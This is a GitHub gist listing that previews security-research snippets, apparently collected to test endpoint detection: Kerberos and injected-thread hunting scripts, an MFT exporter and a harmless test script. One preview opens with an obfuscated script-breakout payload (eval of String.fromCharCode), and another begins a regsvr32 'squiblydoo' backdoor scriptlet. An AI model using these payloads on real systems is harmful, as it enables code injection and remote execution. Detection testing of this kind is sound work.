cbresponse
cbresponse
/ gist:410bdef54f5b45e36e8e40867d2b23d4
Created
April 15, 2020 18:54
— forked from jonmarkgo/gist:3431818
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| </script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36 |
cbresponse
/ Get-KerberosTicketGrantingTicket.ps1
Created
June 29, 2019 05:21
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
cbresponse
/ noharm.ps1
Created
July 2, 2018 02:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function WriteMessage() | |
| { | |
| Write-Host "This is a test PowerShell Script that does no harm at all" -ForegroundColor Green -BackgroundColor DarkGray | |
| } | |
| WriteMessage |
cbresponse
/ Backdoor.sct
Last active
June 23, 2018 07:43
— forked from api0cradle/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
cbresponse
/ Get-InjectedThread.ps1
Created
June 18, 2018 12:55
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
cbresponse
/ Export-MFT.ps1
Created
June 18, 2018 12:53
— forked from secabstraction/Export-MFT.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Export-MFT { | |
| <# | |
| .SYNOPSIS | |
| Extracts master file table from volume. | |
| Version: 0.1 | |
| Author : Jesse Davis (@secabstraction) | |
| License: BSD 3-Clause | |
| .DESCRIPTION |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Powershell.exe get-process |
NewerOlder